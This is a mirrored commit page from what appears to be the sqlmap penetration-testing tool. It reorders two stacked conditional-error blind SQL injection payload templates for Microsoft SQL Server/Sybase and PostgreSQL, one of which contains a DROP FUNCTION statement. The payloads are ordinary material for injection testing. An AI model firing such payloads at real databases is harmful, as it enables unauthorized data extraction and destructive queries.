Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit 1f82d29

Browse files
bdamelebdamele
committed
switch two conditional payloads for proper detection
1 parent 5e358b5 commit 1f82d29

1 file changed

Lines changed: 14 additions & 14 deletions

File tree

xml/payloads.xml

Lines changed: 14 additions & 14 deletions
Original file line numberDiff line numberDiff line change
@@ -1068,44 +1068,44 @@ Formats:
10681068
</test>
10691069

10701070
<test>
1071-
<title>PostgreSQL stacked conditional-error blind queries</title>
1071+
<title>Microsoft SQL Server/Sybase stacked conditional-error blind queries</title>
10721072
<stype>1</stype>
10731073
<level>3</level>
10741074
<risk>0</risk>
10751075
<clause>0</clause>
1076-
<where>2</where>
1077-
<vector>; SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END);</vector>
1076+
<where>1</where>
1077+
<vector>; IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR];</vector>
10781078
<request>
1079-
<payload>; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END);</payload>
1079+
<payload>; IF([RANDNUM]=[RANDNUM]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR];</payload>
10801080
<comment>--</comment>
10811081
</request>
10821082
<response>
1083-
<comparison>; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END);</comparison>
1083+
<comparison>; IF([RANDNUM]=[RANDNUM1]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR];</comparison>
10841084
</response>
10851085
<details>
1086-
<dbms>PostgreSQL</dbms>
1086+
<dbms>Microsoft SQL Server</dbms>
1087+
<dbms>Sybase</dbms>
1088+
<os>Windows</os>
10871089
</details>
10881090
</test>
10891091

10901092
<test>
1091-
<title>Microsoft SQL Server/Sybase stacked conditional-error blind queries</title>
1093+
<title>PostgreSQL stacked conditional-error blind queries</title>
10921094
<stype>1</stype>
10931095
<level>3</level>
10941096
<risk>0</risk>
10951097
<clause>0</clause>
1096-
<where>1</where>
1097-
<vector>; IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR];</vector>
1098+
<where>2</where>
1099+
<vector>; SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END);</vector>
10981100
<request>
1099-
<payload>; IF([RANDNUM]=[RANDNUM]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR];</payload>
1101+
<payload>; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END);</payload>
11001102
<comment>--</comment>
11011103
</request>
11021104
<response>
1103-
<comparison>; IF([RANDNUM]=[RANDNUM1]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR];</comparison>
1105+
<comparison>; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END);</comparison>
11041106
</response>
11051107
<details>
1106-
<dbms>Microsoft SQL Server</dbms>
1107-
<dbms>Sybase</dbms>
1108-
<os>Windows</os>
1108+
<dbms>PostgreSQL</dbms>
11091109
</details>
11101110
</test>
11111111
<!-- End of stacked conditional-error blind queries tests -->

0 commit comments

Comments
 (0)